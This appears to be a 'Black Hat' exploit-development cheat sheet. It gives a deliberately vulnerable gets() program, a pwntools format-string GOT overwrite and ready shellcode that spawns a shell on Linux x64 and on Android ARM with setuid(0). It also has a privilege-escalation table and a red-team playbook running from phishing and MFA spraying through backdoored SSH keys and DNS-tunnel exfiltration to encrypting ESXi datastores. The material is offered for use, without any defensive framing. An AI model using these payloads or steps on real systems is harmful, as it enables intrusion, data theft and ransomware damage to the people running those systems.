Black Hat | IceHacker

Exploit-Dev Quickstart

Classic Stack Overflow

Overwrite EIP on 32-bit Linux. Compile with -fno-stack-protector -z execstack.

#include <stdio.h>
void vuln() {
  char buf[64];
  gets(buf);              // unsafe
}
int main() { vuln(); }

Format String Write-4-Bytes

Directly overwrite .got entries with %n. Use pwntools fmtstr_payload.

from pwn import *
addr = 0x0804a00c   # puts@GOT
payload = fmtstr_payload(7, {addr: 0x0804867b})

Shellcode Cookbook

Linux x64 execve /bin/sh (22 bytes)

\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\xbf\x2f\x62
\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\xb0\x3b\x0f\x05

Windows 64-bit MessageBoxA

fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 56 48
31 d2 65 48 8b 52 60 48 8b 52 18...

Arm32 /system/bin/sh for Android

push {r7}            @ setuid(0)
mov  r7, #0x17
mov  r0, #0
svc  0

adr  r0, binsh      @ execve
eor  r1, r1, r1
push {r0, r1}
mov  r7, #0xb
svc  0
binsh: .asciz "/system/bin/sh"

Privilege Escalation Matrix

OS	Vector	Tool	Reference
Linux	Kernel exploit	`dirtycow.c`	CVE-2016-5195
Linux	SUID misconfig	`linpeas`	HackTricks
Windows	Kerberoasting	`Rubeus`	ADSecurity
Windows	DLL hijack	`Process Monitor`	PentestLab

Red-Team Methodology

Recon

Subfinder → sublist.txt
httpx probe 443/80
Naabu fast port scan
Nmap service fingerprint

Initial Access

Phishing with CobaltStrike Bofs
Exposed Jenkins script-console
VPN brute w/ hydra + MFA spray

Persistence

Scheduled Task XML drop
SSH authorized_keys backdoor
Chrome extension autostart

Exfil & Impact

Rclone S3 sync over 443
DNS tunneling via iodine
Encrypt ESXi datastore